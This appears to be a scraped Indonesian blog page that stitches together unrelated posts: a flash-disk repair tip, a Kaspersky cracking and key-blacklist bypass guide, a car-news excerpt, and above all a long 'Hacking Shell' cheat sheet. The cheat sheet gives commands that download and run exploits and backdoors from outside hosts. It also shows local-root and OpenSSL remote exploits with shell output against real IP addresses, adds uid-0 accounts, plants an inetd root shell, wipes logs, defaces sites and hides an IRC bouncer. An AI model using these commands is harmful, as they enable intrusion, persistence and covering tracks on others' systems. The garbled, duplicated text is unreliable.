Awal mula ceritanya ketika saya memasukkan program google earth kedalam flashdisk saya, nah ketika saya mau ngehapus programnya tiba-tiba tidak bisa dihapus, kemudian saya mem format ulang falshdisk saya, tapi tetap gagal, karena hasil format saya yang pertama gagal saya mulai penasaran pada akhirnya saya melakukan format ulang yang kedua kalinya dan ternyata flashdisk saya tidak bisa dibuka alias rusak dan muncul tulisan please insert disk Sedangkan jika dilihat propertiesnya terbaca 0 kb.
Tapi jangan khawatir ada kok solusi memperbaikinya silakan ikuti langkah-langkah dibawah ini :
1. Download HP Drive Boot Utility sebesar 45 Mb. Freeware. Software ini mendukung untuk Flash Disk yang bukan keluaran HP.
2. Install software tersebut
3. Tancapkan flashdisk yang bermasalah ke dalam komputer.
4. Jalankan software dan pilihlah drive tempat flash disk anda.
5. Pilih Create New or Replace Existing Configuration
Sekarang selamat mencoba semoga sukses..
Friday, September 30, 2011
cracking kaspersky pure
Berikutcara cracking kaspersky pure..
1. disableself defense
2. matikanproteksidan exit aplikasi
3. Jalankan Kaspersky Hybride Pure-Internet Security 1.4.exe
4.Aktifkankembali Kaspersky pure Anda
5.Aktivasidenganmenggunakan key... (Karenasudahdipatchinggunakanopsi yang paling bawahtidakadaketerangannyauntuk browse key
6. Masukkan key (andabisapake key KIS 2010 atau KIS2011)
Setelah Cracking SelesaiGunakanJuga Anti Blacklistnya
Anti Blacklist bertujuan agar key AndaTidakterblock (Key Blocked)
Dengan Anti Blacklist ini key yang terblacklistbisaandagunakanlagi. Langkah2kurang lebihhampirsamadenganlangkah di atas
1. disableself defense
2. matikanproteksidan exit aplikasi
3. Jalankan Kaspersky Hybride Pure-Internet Security 1.4.exe
4.Aktifkankembali Kaspersky pure Anda
5.Aktivasidenganmenggunakan key... (Karenasudahdipatchinggunakanopsi yang paling bawahtidakadaketerangannyauntuk browse key
6. Masukkan key (andabisapake key KIS 2010 atau KIS2011)
Setelah Cracking SelesaiGunakanJuga Anti Blacklistnya
Anti Blacklist bertujuan agar key AndaTidakterblock (Key Blocked)
Dengan Anti Blacklist ini key yang terblacklistbisaandagunakanlagi. Langkah2kurang lebihhampirsamadenganlangkah di atas
Jeep's Updated Production Plan Includes Four New Models Covering Most Segments by 2014
While future production plans for the Fiat-Chrysler alliance's Italian brands (Fiat , Alfa Romeo and Lancia) can change from one moment to the other for a variety of reasons, up until now, the American branch of the group has proved to be more reliable and on time when it comes to new projects.
At a recent investors presentation in Germany, the Fiat Group unveiled its product plans for Jeep, which the automaker considers as one of the two global brands in the alliance, the other one being Alfa Romeo.
Under the revitalization plan, which runs up until 2014, Jeep will expand its portfolio with a series of new models to cover all SUV/Crossover segments. The group's –admittedly ambitious- goal is to double Jeep's global sales from around 400,000 units in 2010 to about 800,000 vehicles in 2014.
Read more »CARA PASANG RADIO PADA BLOG (pasang radio FM pada blog anda)
cara memasang radio FM pada blog, anda ingin mempunyai radio online pada blog anda ?
saya ada sebuah scipt radio FM yang culup menarik, yang bisa anda coba...
Langsung saja :
1. tambah gadget : pada blog anda dengan click pengaturan pada blog, clik tambah gadget cari HTML/java script..
2. Copy kode di bawah ini pada isi dari HTML/java script yanga anda pilih tadi...
saya ada sebuah scipt radio FM yang culup menarik, yang bisa anda coba...
Langsung saja :
1. tambah gadget : pada blog anda dengan click pengaturan pada blog, clik tambah gadget cari HTML/java script..
2. Copy kode di bawah ini pada isi dari HTML/java script yanga anda pilih tadi...
MANIPULASI PROCES DENGAN PROCPS
Posted: January 18, 2007 by miji in hacking
0
Kamu sudah semalaman melakukan mass-scanning IP class B dengan xpl0it-scanner
release terbaru dan ternyata setelah mendapatkan "b0x" yang vulner kamu
adalah orang yg kesekian masuk kesitu. (Hehehehe......biasalah script-kiddies kan
bisanya cuma yg begini aja, klo nentuin targetnya secara spesifik trus bisa dapetin
b0xnya, wow.....yg ini baru 31337).
Ok, kembali ke pembahasan tadi, ternyata di b0x tsb sudah ada beberapa
"tamu_ilegal" yg sudah memasang backd00r, sniFFer, psyBNC atau sedang 'in
action'. Pasti tau donk gimana umur b0x ilegal tsb apabila digunakan
oleh banyak "tamu_ilegal" yg bersemayam disitu. Nah klo kamu ketemu yang
begini, pernah kepikiran nggak untuk meng KILL -9 PID program dari "tamu_ilegal"
yang lain? Klo kamu berpikir untuk menggunakan
"ps -awux | grep proses-bla-ble-blu", hiksss.......rumitnya.
Atau kamu pernah salah meng-KILL suatu proses yang ternyata proses itu adalah
jantungnya OS hanya karena salah mengetikkan PID-nya?
Pasti kebayang donk gimana susahnya. Padahal kamu udah bela-belain ngecheck PID nya
dengan menggunakan senjata andalan kamu: "ps -awux | grep
proses-bla-ble-blu".
Trus klo kamu mau tau (bagi yang belum tau aja, bagi yg sudah tau saya mohon
koreksinya apabila terdapat kesalahan atau kekurangan dalam membahas) suatu proses
manipulator yg efektif, efisien, coba deh lanjutkan bacanya. ;>
Procps adalah suatu proses tool package yang terkenal kehandalannya. Dalam package
ini terdapat diantaranya command "top" yang pasti kamu2 sudah kenal
kegunaannya. Pada artikel ini yang akan dibahas bukan tentang "top",
melainkan utility-utility lainnya.Diantaranya:
1) skill : mengirim sinyal ke suatu proses dengan menggunakan parameter username
atau terminal atau PIDnya.
Sinyal yang dikirim dapat berupa HUP, INT, KILL, STOP atau CONT.
Contoh:
Untuk menghentikan (freeze) kegiatan user yg sedang login melalui terminal pts/2:
r00t@finger:~# skill -STOP pts/2
Untuk menghilangkan freeze pd user tsb sehingga bisa melanjutkan aktivitasnya:
r00t@finger:~# skill -CONT pts/2
2) snice : hampir sama dgn skill namun tidak mengirimkan sinyal melainkan menentukan
langsung prioritasnya. Default snice adalah +4. Sedangkan range prioritasnya dari
+20 (last priority) hingga -20 (first priority).
contoh:
Untuk me'renice' (menentukan prioritas) semua process yg sedang dijalankan oleh user
"tamu_ilegal" menjadi last priority, gunakan +20:
r00t@finger:~# snice +20 tamu_ilegal <--- tamu_ilegal akan berpikir kalau shellnya lag. 3) pkill : hampir sama dengan skill, namun dengan menggunakan parameter yang normal. Biasanya untuk menghindari antara "username", "processname", atau "terminalname" yang memiliki sebutan yang sama. Misalnya username = finger, processname = finger, dan terminalname = bash, maka kesalahan yg terjadi apabila menggunakan perintah skill dapat dihindari. contoh: r00t@finger:~# skill KILL finger bash <--- finger username atau processname??? bedakan: r00t@finger:~# pkill KILL -u finger bash <--- parameter -u menentukan finger yg username. 4) pgrep : cara kerjanya sama dengan pkill namun tidak mengirimkan signal ke setiap process, pgrep akan menampilkan setiap PID yang matching kedalam STDOUT. contoh: Kebanyakan script kiddies menjalankan suatu process faker (pemalsu proses) dengan tujuan tidak dicurigai oleh root legal. Namun hampir semua process faker itu dinamai dengan httpd. ~ kill@finger:~$ pgrep httpd 4312 4313 4314 4315 4316 4317 5671 hehehhehehe................ 5) vmstat : memberikan informasi tentang virtual memory dan cpu statistik: kill@finger:~$ vmstat procps memory swap io system cpu r b w swpd free buff cache si so bi bo in cs us sy id 0 0 0 5676 6716 35804 58940 0 0 9 9 7 9 0 0 29 Kalau kamu ingin melihat perubahan dgn vmstat setelah beberapa detik, tambahkan angka pada commandline vmstat. Angka tsb adalah sebagai delay time sebelum datanya di refresh.
0
Kamu sudah semalaman melakukan mass-scanning IP class B dengan xpl0it-scanner
release terbaru dan ternyata setelah mendapatkan "b0x" yang vulner kamu
adalah orang yg kesekian masuk kesitu. (Hehehehe......biasalah script-kiddies kan
bisanya cuma yg begini aja, klo nentuin targetnya secara spesifik trus bisa dapetin
b0xnya, wow.....yg ini baru 31337).
Ok, kembali ke pembahasan tadi, ternyata di b0x tsb sudah ada beberapa
"tamu_ilegal" yg sudah memasang backd00r, sniFFer, psyBNC atau sedang 'in
action'. Pasti tau donk gimana umur b0x ilegal tsb apabila digunakan
oleh banyak "tamu_ilegal" yg bersemayam disitu. Nah klo kamu ketemu yang
begini, pernah kepikiran nggak untuk meng KILL -9 PID program dari "tamu_ilegal"
yang lain? Klo kamu berpikir untuk menggunakan
"ps -awux | grep proses-bla-ble-blu", hiksss.......rumitnya.
Atau kamu pernah salah meng-KILL suatu proses yang ternyata proses itu adalah
jantungnya OS hanya karena salah mengetikkan PID-nya?
Pasti kebayang donk gimana susahnya. Padahal kamu udah bela-belain ngecheck PID nya
dengan menggunakan senjata andalan kamu: "ps -awux | grep
proses-bla-ble-blu".
Trus klo kamu mau tau (bagi yang belum tau aja, bagi yg sudah tau saya mohon
koreksinya apabila terdapat kesalahan atau kekurangan dalam membahas) suatu proses
manipulator yg efektif, efisien, coba deh lanjutkan bacanya. ;>
Procps adalah suatu proses tool package yang terkenal kehandalannya. Dalam package
ini terdapat diantaranya command "top" yang pasti kamu2 sudah kenal
kegunaannya. Pada artikel ini yang akan dibahas bukan tentang "top",
melainkan utility-utility lainnya.Diantaranya:
1) skill : mengirim sinyal ke suatu proses dengan menggunakan parameter username
atau terminal atau PIDnya.
Sinyal yang dikirim dapat berupa HUP, INT, KILL, STOP atau CONT.
Contoh:
Untuk menghentikan (freeze) kegiatan user yg sedang login melalui terminal pts/2:
r00t@finger:~# skill -STOP pts/2
Untuk menghilangkan freeze pd user tsb sehingga bisa melanjutkan aktivitasnya:
r00t@finger:~# skill -CONT pts/2
2) snice : hampir sama dgn skill namun tidak mengirimkan sinyal melainkan menentukan
langsung prioritasnya. Default snice adalah +4. Sedangkan range prioritasnya dari
+20 (last priority) hingga -20 (first priority).
contoh:
Untuk me'renice' (menentukan prioritas) semua process yg sedang dijalankan oleh user
"tamu_ilegal" menjadi last priority, gunakan +20:
r00t@finger:~# snice +20 tamu_ilegal <--- tamu_ilegal akan berpikir kalau shellnya lag. 3) pkill : hampir sama dengan skill, namun dengan menggunakan parameter yang normal. Biasanya untuk menghindari antara "username", "processname", atau "terminalname" yang memiliki sebutan yang sama. Misalnya username = finger, processname = finger, dan terminalname = bash, maka kesalahan yg terjadi apabila menggunakan perintah skill dapat dihindari. contoh: r00t@finger:~# skill KILL finger bash <--- finger username atau processname??? bedakan: r00t@finger:~# pkill KILL -u finger bash <--- parameter -u menentukan finger yg username. 4) pgrep : cara kerjanya sama dengan pkill namun tidak mengirimkan signal ke setiap process, pgrep akan menampilkan setiap PID yang matching kedalam STDOUT. contoh: Kebanyakan script kiddies menjalankan suatu process faker (pemalsu proses) dengan tujuan tidak dicurigai oleh root legal. Namun hampir semua process faker itu dinamai dengan httpd. ~ kill@finger:~$ pgrep httpd 4312 4313 4314 4315 4316 4317 5671 hehehhehehe................ 5) vmstat : memberikan informasi tentang virtual memory dan cpu statistik: kill@finger:~$ vmstat procps memory swap io system cpu r b w swpd free buff cache si so bi bo in cs us sy id 0 0 0 5676 6716 35804 58940 0 0 9 9 7 9 0 0 29 Kalau kamu ingin melihat perubahan dgn vmstat setelah beberapa detik, tambahkan angka pada commandline vmstat. Angka tsb adalah sebagai delay time sebelum datanya di refresh.
Hacking Shell
Posted: January 22, 2007 by miji in hacking
0
TRIK MEMBUAT PSYBNC : =================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; cd var/tmp/;
mkdir …. ; cd …. ; wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ;
cd .log ; make; mv psybnc “bash ” ; rm psybnc.conf ; wget http://www.geocities.com/lifron/psybnc.conf.20075.txt;
mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt ” ” ; pwd ; PATH=$PATH:/var/tmp/…./.log/;
“bash ” ” “mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ;
find |grep psybnc
===================================================
: TRIK MENGHAPUS LOG :
=================================================== echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================== rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
===================================================
: LOCAL ROOT MANDRAKE :
=================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir ” ” ; cd ” ”
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7.mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo “tondano::0:0::/.tondano:/bin/bash” >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14.last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/” ” <== Bersihkan semua tools 25. Test shell dengan port 7788, login as : root, password : gohanz =================================================== find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA ToNDaNo Was Here” > index.html
=================================================== cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA ToNDaNo Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
===================================================
BIKIN BACKDOOR
=================================================== echo “kuntua 1979/tcp” >> /etc/services
echo “dial stream tcp nowait root /bin/sh sh -i” >> /etc/inetd.conf kill -HUP 135
telnet dengan port “1979″
=================================================== http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================== [root@gila /]#rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1
[root@gila /]# nmblookup -d2 ‘*’ #untuk mendeteksi netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
—————————————–
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
——— —- ——-
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================== bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================== gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================== : BERSIHKAN LOG :
=================================================== ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================== securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================== 1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================== 1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================== 1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0×15 -v 212.70.224.129
=================================================== 1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
================================================ 1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
================================================ 1. wgetwww.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
================================================ 1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
================================================ 1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning ./sambal -d 0 -C 60 -S IP | grep samba ./sambal -b 0 -v IP <=== attack ================================================ SecureCRT: http://www.vandyke.com/ TTSSH: http://www.zip.com.au/~roca/ttssh.html PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html SecureShell: http://public.srce.hr/~cigaly/ssh/ ================================================ DEFACE ================================================ find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA Was Here” > index.html
================================================ cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
================================================ Install WGET
================================================ 1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+…&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff ./configure make ssh ./ssh -l root ./ssh -l root 66.136.37.101 ./ssh -l root 66.149.178.214 ================================================ : COMMAND ADDUSER : ================================================ /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua /usr/sbin/useradd tondano -u 0 -d / passwd -d kuntua Changing password for user kuntua Removing password for user kuntua passwd: Success passwd -d tondano Changing password for user tondano Removing password for user tondano passwd: Success ================================================ passwd kuntua New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user kuntua passwd: all authentication tokens updated successfully password tondano New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user tondano passwd: all authentication tokens updated successfully ================================================ ================================================ OPENSSL-TOO-OPEN ================================================ ./openssl -a 0×15 -v 61.220.53.91 : openssl-too-open : OpenSSL remote exploit by Solar Eclipse : Opening 30 connections Establishing SSL connections -> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0×80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0×80e1638 start_addr: 0×80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell…
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
================================================ : MARI KITA MAINKAN ROOTNYA :
================================================ unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir … ; cd ….
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir ’segfault.eng’ and touch a file named ’segfault.eng’ in it.
Then exec “./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792″ to get rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
================================================ /usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo “apache::0:0::/mails:/bin/bash” >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/” ”
cd /var/tmp/” ”
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/” ” <== del semua tools test shell with port 7788 and password 35b4tud1n91n ================================================ [Langkah Hapus Log I] ================================================ export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ================================================ [Langkah Hapus Log I] ================================================ rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r ================================================ wget http://brutalside.host.sk/tools/term chmod +x term ./term lonthe123 ================================================ wget http://brutalside.host.sk/tools/ftp.tgz gunzip ftp.tgz gzip ftp.tar tar -zxvf ftp.tar.gz cd ftp ./scan 163 22 10 ./scan 163 22 10 163 ================================================ scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
================================================ http://brutalside.host.sk/tools/kik
chmod +x kik
./kik “-bash” ./psybnc
================================================ ================================================ find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh…?
yg terjadi adalah uid dan gid kita adalah 0
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
./psybnc psybnc.conf
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc “syslogd ”
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
mv psybnc.conf ” ” ; pwd
PATH=$PATH:/var/tmp/” “/.log/
“syslogd ” ” ”
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
================================================ +Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan - ./apache IPTarget (Mis: ./apache 202.11159.67.176) ================================== +Command MassApache - ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan - ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176) ================================================ +FTP Command 4 RooT - ./scan No Depan IP Target (Mis: ./scannn 210 21 10) =addUser= uid=0(root) gid=0(root) groups=50(ftp) Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter, buat password ketik passwd kuntua enter , abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita Changing password for user ganjen passwd: all authentication tokens updated successfully berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah.. kalo mau dapet acces root ketik : /usr/sbin/useradd bash -u 0 -d / abis itu ketik lagi passwd -d bash apus jejak cd / rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog
udah di ketik semua ? udahh… tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
—————–
Patch Your Root
—————–
wget http://www.geocities.com/lifron/patch.tar.gz
